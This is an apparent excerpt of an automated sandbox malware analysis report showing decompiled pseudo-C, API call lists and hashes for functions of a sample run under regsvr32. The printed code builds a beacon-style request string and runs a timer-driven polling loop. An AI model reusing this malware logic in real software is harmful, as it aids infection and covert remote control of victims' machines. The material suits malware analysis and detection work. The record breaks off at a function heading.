                    0x04f9696b
                    0x04f9696d
                    0x04f96970
                    0x04f96977
                    0x04f96979
                    0x04f96982
                    0x04f9698d
                    0x04f9698f
                    0x04f96992
                    0x04f96992
                    0x04f96994
                    0x04f96999
                    0x04f9699d
                    0x04f9699f
                    0x04f969a4
                    0x04f969b0
                    0x04f969b2
                    0x04f969be
                    0x04f969c0
                    0x04f969c0
                    0x04f969cb
                    0x04f969cf
                    0x04f969d1
                    0x04f969d6
                    0x04f969e2
                    0x04f969e4
                    0x04f969f0
                    0x04f969f2
                    0x04f969f2
                    0x04f969f8
                    0x04f96a0b
                    0x04f96a0f
                    0x04f96a16
                    0x04f96a19
                    0x04f96a1e
                    0x04f96a29
                    0x04f96a2b
                    0x04f96a2e
                    0x04f96a2e
                    0x04f96a30
                    0x04f96a37
                    0x04f96a3a
                    0x04f96a3f
                    0x04f96a49
                    0x04f96a4b
                    0x04f96a53
                    0x04f96a6c
                    0x04f96a70
                    0x04f96a7c
                    0x04f96a81
                    0x04f96a8a
                    0x04f96a9b
                    0x04f96a9f
                    0x04f96aa8
                    0x04f96aae
                    0x04f96ab6
                    0x04f96abb
                    0x04f96ac8
                    0x04f96ace
                    0x04f96ada
                    0x04f96ae0
                    0x04f96ae1
                    0x04f96ae8
                    0x04f96aec
                    0x04f96af2
                    0x04f96af9
                    0x04f96b00
                    0x04f96b06
                    0x04f96b0d
                    0x04f96b11
                    0x04f96b1c
                    0x04f96b23
                    0x04f96b27
                    0x04f96b30
                    0x04f96b30
                    0x04f96b41
                    0x04f96b41
                    0x04f96b50
                    0x04f96b50
                    0x04f96b5f
                    0x04f96b5f
                    0x04f96b71
                    0x04f96b71
                    0x04f96b80
                    0x04f96b90

                    APIs
                    • GetTickCount.KERNEL32 ref: 04F96901
                    • wsprintfA.USER32 ref: 04F9694E
                    • wsprintfA.USER32 ref: 04F9696B
                    • wsprintfA.USER32 ref: 04F9698D
                    • wsprintfA.USER32 ref: 04F969B0
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F969C0
                    • wsprintfA.USER32 ref: 04F969E2
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F969F2
                    • wsprintfA.USER32 ref: 04F96A29
                    • wsprintfA.USER32 ref: 04F96A49
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F96A66
                    • GetTickCount.KERNEL32 ref: 04F96A76
                    • RtlEnterCriticalSection.NTDLL(05AC9570), ref: 04F96A8A
                    • RtlLeaveCriticalSection.NTDLL(05AC9570), ref: 04F96AA8
                      • Part of subcall function 04F918BA: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04F96ABB,?,05AC95B0), ref: 04F918E5
                      • Part of subcall function 04F918BA: lstrlen.KERNEL32(?,?,?,04F96ABB,?,05AC95B0), ref: 04F918ED
                      • Part of subcall function 04F918BA: strcpy.NTDLL ref: 04F91904
                      • Part of subcall function 04F918BA: lstrcat.KERNEL32(00000000,?), ref: 04F9190F
                      • Part of subcall function 04F918BA: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04F96ABB,?,05AC95B0), ref: 04F9192C
                    • StrTrimA.SHLWAPI(00000000,04F9928C,?,05AC95B0), ref: 04F96ADA
                      • Part of subcall function 04F9252A: lstrlen.KERNEL32(05AC9B50,00000000,00000000,7691C740,04F96AE6,00000000), ref: 04F9253A
                      • Part of subcall function 04F9252A: lstrlen.KERNEL32(?), ref: 04F92542
                      • Part of subcall function 04F9252A: lstrcpy.KERNEL32(00000000,05AC9B50), ref: 04F92556
                      • Part of subcall function 04F9252A: lstrcat.KERNEL32(00000000,?), ref: 04F92561
                    • lstrcpy.KERNEL32(00000000,?), ref: 04F96AF9
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 04F96B00
                    • lstrcat.KERNEL32(00000000,?), ref: 04F96B0D
                    • lstrcat.KERNEL32(00000000,00000000), ref: 04F96B11
                      • Part of subcall function 04F91AA2: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 04F91B54
                    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04F96B41
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04F96B50
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,05AC95B0), ref: 04F96B5F
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F96B71
                    • HeapFree.KERNEL32(00000000,?), ref: 04F96B80
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                    • String ID: Ut
                    • API String ID: 1892477351-8415677
                    • Opcode ID: 6330b22abcaba9baf9cc872ab497a7b7cbe5a9ca70d9e6d1461a7da40519dfe4
                    • Instruction ID: 87866d4153c36e3e0694fc39a0c6e89032a23f5171de5cf1a704ce433487287b
                    • Opcode Fuzzy Hash: 6330b22abcaba9baf9cc872ab497a7b7cbe5a9ca70d9e6d1461a7da40519dfe4
                    • Instruction Fuzzy Hash: 23718B72900249AFEB129B64FC88F5A37E8FB48314F050518F959D7260DF3AEC1ADB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F92FC4 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 255memorystringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 75%
                    			E04F92FC4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, void* _a20) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				void* _t77;
				void* _t79;
				void* _t82;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				void* _t93;
				void* _t98;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				signed int _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				intOrPtr _t136;
				int _t139;
				CHAR* _t140;
				intOrPtr _t141;
				void* _t142;
				void* _t151;
				int _t152;
				void* _t153;
				intOrPtr _t154;
				void* _t156;
				long _t160;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t165;
				void* _t166;
				void* _t168;

				_t151 = __edx;
				_t142 = __ecx;
				_t63 = __eax;
				_v8 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x4f9a018; // 0x3639fe1b
				asm("bswap eax");
				_t65 =  *0x4f9a014; // 0x3a87c8cd
				_t140 = _a20;
				asm("bswap eax");
				_t66 =  *0x4f9a010; // 0xd8d2f808
				asm("bswap eax");
				_t67 =  *0x4f9a00c; // 0xeec43f25
				asm("bswap eax");
				_t68 =  *0x4f9a320; // 0xb2d5a8
				_t3 = _t68 + 0x4f9b633; // 0x74666f73
				_t152 = wsprintfA(_t140, _t3, 3, 0x3d170, _t67, _t66, _t65, _t64,  *0x4f9a02c,  *0x4f9a004, _t63);
				_t71 = E04F94B2C();
				_t72 =  *0x4f9a320; // 0xb2d5a8
				_t4 = _t72 + 0x4f9b673; // 0x74707526
				_t75 = wsprintfA(_t152 + _t140, _t4, _t71);
				_t168 = _t166 + 0x38;
				_t153 = _t152 + _t75;
				if(_a8 != 0) {
					_t136 =  *0x4f9a320; // 0xb2d5a8
					_t8 = _t136 + 0x4f9b67e; // 0x732526
					_t139 = wsprintfA(_t153 + _t140, _t8, _a8);
					_t168 = _t168 + 0xc;
					_t153 = _t153 + _t139; // executed
				}
				_t76 = E04F9256F(_t142); // executed
				_t141 = __imp__; // 0x74e05520
				_a8 = _t76;
				if(_t76 != 0) {
					_t130 =  *0x4f9a320; // 0xb2d5a8
					_t11 = _t130 + 0x4f9b8d4; // 0x736e6426
					_t134 = wsprintfA(_a20 + _t153, _t11, _t76);
					_t168 = _t168 + 0xc;
					_t153 = _t153 + _t134;
					HeapFree( *0x4f9a2d8, 0, _a8);
				}
				_t77 = E04F94B71();
				_a8 = _t77;
				if(_t77 != 0) {
					_t125 =  *0x4f9a320; // 0xb2d5a8
					_t15 = _t125 + 0x4f9b8dc; // 0x6f687726
					wsprintfA(_t153 + _a20, _t15, _t77);
					_t168 = _t168 + 0xc;
					HeapFree( *0x4f9a2d8, 0, _a8);
				}
				_t154 =  *0x4f9a3cc; // 0x5ac95b0
				_t79 = E04F97729(0x4f9a00a, _t154 + 4);
				_t160 = 0;
				_v16 = _t79;
				if(_t79 == 0) {
					L28:
					RtlFreeHeap( *0x4f9a2d8, _t160, _a20); // executed
					return _v8;
				} else {
					_t82 = RtlAllocateHeap( *0x4f9a2d8, 0, 0x800); // executed
					_a8 = _t82;
					if(_t82 == 0) {
						L27:
						HeapFree( *0x4f9a2d8, _t160, _v16);
						goto L28;
					}
					E04F953EC(GetTickCount());
					_t86 =  *0x4f9a3cc; // 0x5ac95b0
					__imp__(_t86 + 0x40);
					asm("lock xadd [eax], ecx");
					_t90 =  *0x4f9a3cc; // 0x5ac95b0
					__imp__(_t90 + 0x40);
					_t92 =  *0x4f9a3cc; // 0x5ac95b0
					_t93 = E04F918BA(1, _t151, _a20,  *_t92); // executed
					_t156 = _t93;
					_v24 = _t156;
					asm("lock xadd [eax], ecx");
					if(_t156 == 0) {
						L26:
						RtlFreeHeap( *0x4f9a2d8, _t160, _a8); // executed
						goto L27;
					}
					StrTrimA(_t156, 0x4f9928c);
					_push(_t156);
					_t98 = E04F9252A();
					_v12 = _t98;
					if(_t98 == 0) {
						L25:
						HeapFree( *0x4f9a2d8, _t160, _t156);
						goto L26;
					}
					_t161 = __imp__;
					 *_t161(_t156, _a4);
					 *_t161(_a8, _v16);
					_t162 = __imp__;
					 *_t162(_a8, _v12);
					_t104 = E04F95406( *_t162(_a8, _t156), _a8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v8 = 8;
						L23:
						E04F95F6A();
						L24:
						HeapFree( *0x4f9a2d8, 0, _v12);
						_t160 = 0;
						goto L25;
					}
					_t108 = E04F922C7(_t141, 0xffffffffffffffff, _t156,  &_v20); // executed
					_v8 = _t108;
					if(_t108 == 0) {
						_t165 = _v20;
						_t115 = E04F91E51(_t165, _a4, _a12, _a16); // executed
						_v8 = _t115;
						_t116 =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t165 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t165;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E04F917AB(_t165);
					}
					if(_v8 != 0x10d2) {
						L18:
						if(_v8 == 0) {
							_t110 = _a12;
							if(_t110 != 0) {
								_t157 =  *_t110;
								_t163 =  *_a16;
								wcstombs( *_t110,  *_t110,  *_a16);
								_t113 = E04F95D6F(_t157, _t157, _t163 >> 1);
								_t156 = _v24;
								 *_a16 = _t113;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E04F917AB(_a4);
							if(_v8 == 0 || _v8 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L18;
					}
				}
			}
























































                    0x04f92fc4
                    0x04f92fc4
                    0x04f92fc4
                    0x04f92fcf
                    0x04f92fd6
                    0x04f92fd8
                    0x04f92fd8
                    0x04f92fe5
                    0x04f92ff0
                    0x04f92ff3
                    0x04f92ff8
                    0x04f93001
                    0x04f93004
                    0x04f93009
                    0x04f9300c
                    0x04f93011
                    0x04f93014
                    0x04f93020
                    0x04f9302d
                    0x04f9302f
                    0x04f93035
                    0x04f9303a
                    0x04f93045
                    0x04f93047
                    0x04f9304a
                    0x04f93050
                    0x04f93052
                    0x04f9305a
                    0x04f93065
                    0x04f93067
                    0x04f9306a
                    0x04f9306a
                    0x04f9306c
                    0x04f93073
                    0x04f93079
                    0x04f9307c
                    0x04f9307f
                    0x04f93084
                    0x04f93091
                    0x04f93093
                    0x04f93099
                    0x04f930a3
                    0x04f930a3
                    0x04f930a5
                    0x04f930ac
                    0x04f930af
                    0x04f930b2
                    0x04f930b7
                    0x04f930c4
                    0x04f930c6
                    0x04f930d4
                    0x04f930d4
                    0x04f930d6
                    0x04f930e4
                    0x04f930e9
                    0x04f930ed
                    0x04f930f0
                    0x04f932b1
                    0x04f932bb
                    0x04f932c4
                    0x04f930f6
                    0x04f93102
                    0x04f9310a
                    0x04f9310d
                    0x04f932a5
                    0x04f932af
                    0x00000000
                    0x04f932af
                    0x04f93119
                    0x04f9311e
                    0x04f93127
                    0x04f93138
                    0x04f9313c
                    0x04f93145
                    0x04f9314b
                    0x04f93155
                    0x04f9315a
                    0x04f93161
                    0x04f9316a
                    0x04f93170
                    0x04f93299
                    0x04f932a3
                    0x00000000
                    0x04f932a3
                    0x04f9317c
                    0x04f93182
                    0x04f93183
                    0x04f9318a
                    0x04f9318d
                    0x04f9328f
                    0x04f93297
                    0x00000000
                    0x04f93297
                    0x04f93196
                    0x04f9319d
                    0x04f931a5
                    0x04f931aa
                    0x04f931b3
                    0x04f931be
                    0x04f931c5
                    0x04f931c8
                    0x04f932c7
                    0x04f9327b
                    0x04f9327b
                    0x04f93280
                    0x04f9328b
                    0x04f9328d
                    0x00000000
                    0x04f9328d
                    0x04f931d2
                    0x04f931d9
                    0x04f931dc
                    0x04f931e1
                    0x04f931ec
                    0x04f931f1
                    0x04f931f4
                    0x04f931fa
                    0x04f93200
                    0x04f93206
                    0x04f93209
                    0x04f9320f
                    0x04f93212
                    0x04f93217
                    0x04f9321b
                    0x04f9321b
                    0x04f93227
                    0x04f93233
                    0x04f93237
                    0x04f93239
                    0x04f9323e
                    0x04f93240
                    0x04f93245
                    0x04f9324a
                    0x04f93257
                    0x04f9325f
                    0x04f93262
                    0x04f93262
                    0x04f9323e
                    0x00000000
                    0x04f93229
                    0x04f9322d
                    0x04f93264
                    0x04f93267
                    0x04f93270
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04f93270
                    0x04f9322f
                    0x00000000
                    0x04f9322f
                    0x04f93227

                    APIs
                    • GetTickCount.KERNEL32 ref: 04F92FD8
                    • wsprintfA.USER32 ref: 04F93028
                    • wsprintfA.USER32 ref: 04F93045
                    • wsprintfA.USER32 ref: 04F93065
                    • wsprintfA.USER32 ref: 04F93091
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F930A3
                    • wsprintfA.USER32 ref: 04F930C4
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F930D4
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F93102
                    • GetTickCount.KERNEL32 ref: 04F93113
                    • RtlEnterCriticalSection.NTDLL(05AC9570), ref: 04F93127
                    • RtlLeaveCriticalSection.NTDLL(05AC9570), ref: 04F93145
                      • Part of subcall function 04F918BA: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04F96ABB,?,05AC95B0), ref: 04F918E5
                      • Part of subcall function 04F918BA: lstrlen.KERNEL32(?,?,?,04F96ABB,?,05AC95B0), ref: 04F918ED
                      • Part of subcall function 04F918BA: strcpy.NTDLL ref: 04F91904
                      • Part of subcall function 04F918BA: lstrcat.KERNEL32(00000000,?), ref: 04F9190F
                      • Part of subcall function 04F918BA: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04F96ABB,?,05AC95B0), ref: 04F9192C
                    • StrTrimA.SHLWAPI(00000000,04F9928C,?,05AC95B0), ref: 04F9317C
                      • Part of subcall function 04F9252A: lstrlen.KERNEL32(05AC9B50,00000000,00000000,7691C740,04F96AE6,00000000), ref: 04F9253A
                      • Part of subcall function 04F9252A: lstrlen.KERNEL32(?), ref: 04F92542
                      • Part of subcall function 04F9252A: lstrcpy.KERNEL32(00000000,05AC9B50), ref: 04F92556
                      • Part of subcall function 04F9252A: lstrcat.KERNEL32(00000000,?), ref: 04F92561
                    • lstrcpy.KERNEL32(00000000,?), ref: 04F9319D
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 04F931A5
                    • lstrcat.KERNEL32(00000000,?), ref: 04F931B3
                    • lstrcat.KERNEL32(00000000,00000000), ref: 04F931B9
                      • Part of subcall function 04F95406: lstrlen.KERNEL32(?,00000000,05AC9D58,00000000,04F93C77,05AC9F7B,69B25F44,?,?,?,?,69B25F44,00000005,04F9A00C,4D283A53,?), ref: 04F9540D
                      • Part of subcall function 04F95406: mbstowcs.NTDLL ref: 04F95436
                      • Part of subcall function 04F95406: memset.NTDLL ref: 04F95448
                    • wcstombs.NTDLL ref: 04F9324A
                      • Part of subcall function 04F91E51: SysAllocString.OLEAUT32(?), ref: 04F91E92
                      • Part of subcall function 04F91E51: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 04F91F14
                      • Part of subcall function 04F91E51: StrStrIW.SHLWAPI(?,006E0069), ref: 04F91F53
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    • HeapFree.KERNEL32(00000000,?,00000000), ref: 04F9328B
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04F93297
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,05AC95B0), ref: 04F932A3
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F932AF
                    • RtlFreeHeap.NTDLL(00000000,?), ref: 04F932BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Heap$Free$lstrlenwsprintf$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                    • String ID: Ut
                    • API String ID: 3111183435-8415677
                    • Opcode ID: cd2dbfdbadb57d0a6c3532bd73dc2e5d5ec85f51aecd141bd5b39f64694d30b6
                    • Instruction ID: b8729c12811f8b7764deddcd5ec8c57f88d62473ae2c96a3b5f6fded780f8f06
                    • Opcode Fuzzy Hash: cd2dbfdbadb57d0a6c3532bd73dc2e5d5ec85f51aecd141bd5b39f64694d30b6
                    • Instruction Fuzzy Hash: 78911571900259BFEF15DFA8EC48E9A3BF9EB08314F158055F808D7260DB36AD56DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F95458 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151timememoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 102 4f95458-4f9548a memset CreateWaitableTimerA 103 4f9560b-4f95611 GetLastError 102->103 104 4f95490-4f954e9 _allmul SetWaitableTimer WaitForMultipleObjects 102->104 105 4f95615-4f9561f 103->105 106 4f954ef-4f954f2 104->106 107 4f95573-4f95579 104->107 108 4f954fd 106->108 109 4f954f4 call 4f93399 106->109 110 4f9557a-4f9557e 107->110 114 4f95507 108->114 115 4f954f9-4f954fb 109->115 112 4f9558e-4f95592 110->112 113 4f95580-4f95582 110->113 112->110 116 4f95594-4f9559e CloseHandle 112->116 113->112 117 4f9550b-4f95510 114->117 115->108 115->114 116->105 118 4f95523-4f95550 call 4f93a12 117->118 119 4f95512-4f95519 117->119 123 4f955a0-4f955a5 118->123 124 4f95552-4f9555d 118->124 119->118 120 4f9551b 119->120 120->118 125 4f955c4-4f955cc 123->125 126 4f955a7-4f955ad 123->126 124->117 127 4f9555f-4f9556f call 4f917c0 124->127 129 4f955d2-4f95600 _allmul SetWaitableTimer WaitForMultipleObjects 125->129 126->107 128 4f955af-4f955c2 call 4f95f6a 126->128 127->107 128->129 129->117 132 4f95606 129->132 132->107
                    C-Code - Quality: 83%
                    			E04F95458(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x4f9a2e0);
					_v76 = 0;
					_v80 = 0;
					L04F9818A();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x4f9a30c; // 0x2e8
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x4f9a2ec = 5;
						} else {
							_t69 = E04F93399(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x4f9a300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E04F93A12( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_t97 = _t66 - 3;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v124.HighPart = E04F917C0(_t75, _t97,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x4f9a2e4);
							goto L21;
						} else {
							__eflags =  *0x4f9a2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E04F95F6A();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x4f9a2e8);
								L21:
								L04F9818A();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								__eflags = _t65;
								_v128 = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x4f9a2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}
































                    0x04f95458
                    0x04f9546e
                    0x04f95472
                    0x04f95477
                    0x04f9547e
                    0x04f95486
                    0x04f9548a
                    0x04f95611
                    0x04f95490
                    0x04f95490
                    0x04f95492
                    0x04f95497
                    0x04f95498
                    0x04f9549e
                    0x04f954a2
                    0x04f954a6
                    0x04f954b4
                    0x04f954c2
                    0x04f954c6
                    0x04f954c8
                    0x04f954d5
                    0x04f954e1
                    0x04f954e5
                    0x04f954e9
                    0x04f954f2
                    0x04f954fd
                    0x04f954fd
                    0x04f954f4
                    0x04f954f4
                    0x04f954fb
                    0x00000000
                    0x00000000
                    0x04f954fb
                    0x04f95507
                    0x00000000
                    0x04f9550b
                    0x04f95510
                    0x04f9551b
                    0x04f9551b
                    0x04f95523
                    0x04f95529
                    0x04f95531
                    0x04f9553a
                    0x04f95541
                    0x04f95545
                    0x04f9554c
                    0x04f95550
                    0x00000000
                    0x00000000
                    0x04f95552
                    0x04f95556
                    0x04f95559
                    0x04f9555d
                    0x00000000
                    0x04f9555f
                    0x04f9556f
                    0x04f9556f
                    0x00000000
                    0x04f955a0
                    0x04f955a0
                    0x04f955a5
                    0x04f955c4
                    0x04f955c6
                    0x04f955cb
                    0x04f955cc
                    0x00000000
                    0x04f955a7
                    0x04f955a7
                    0x04f955ad
                    0x00000000
                    0x04f955af
                    0x04f955af
                    0x04f955b4
                    0x04f955b6
                    0x04f955bb
                    0x04f955bc
                    0x04f955d2
                    0x04f955d2
                    0x04f955da
                    0x04f955e8
                    0x04f955ec
                    0x04f955f8
                    0x04f955fa
                    0x04f955fc
                    0x04f95600
                    0x00000000
                    0x04f95606
                    0x00000000
                    0x04f95606
                    0x04f95600
                    0x04f955ad
                    0x00000000
                    0x04f955a5
                    0x04f95573
                    0x04f95575
                    0x04f95579
                    0x04f9557a
                    0x04f9557a
                    0x04f9557e
                    0x04f95588
                    0x04f95588
                    0x04f9558e
                    0x04f95591
                    0x04f95591
                    0x04f95598
                    0x04f95598
                    0x04f9561f
                    0x00000000

                    APIs
                    • memset.NTDLL ref: 04F95472
                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04F9547E
                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04F954A6
                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04F954C6
                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04F966F1,?), ref: 04F954E1
                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04F966F1,?,00000000), ref: 04F95588
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04F966F1,?,00000000,?,?), ref: 04F95598
                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04F955D2
                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 04F955EC
                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04F955F8
                      • Part of subcall function 04F93399: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05AC93D8,00000000,?,74E5F710,00000000,74E5F730), ref: 04F933E8
                      • Part of subcall function 04F93399: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05AC9410,?,00000000,30314549,00000014,004F0053,05AC93CC), ref: 04F93485
                      • Part of subcall function 04F93399: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04F954F9), ref: 04F93497
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04F966F1,?,00000000,?,?), ref: 04F9560B
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                    • String ID: Ut
                    • API String ID: 3521023985-8415677
                    • Opcode ID: 3821899c4ef54d4fb7aa49b81b46f340f97bea9f216fffb40da6cdffbd02e9a4
                    • Instruction ID: edb91a009c3c4cf681eeca934ed461daec49cb93dea2b7e8c3b2c8b7423940a2
                    • Opcode Fuzzy Hash: 3821899c4ef54d4fb7aa49b81b46f340f97bea9f216fffb40da6cdffbd02e9a4
                    • Instruction Fuzzy Hash: C651B1B2808314BFEB119F25DC44D5BBBE9EB84368F104A1EF4A482190D775DD05CF92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F97A34 Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 92%
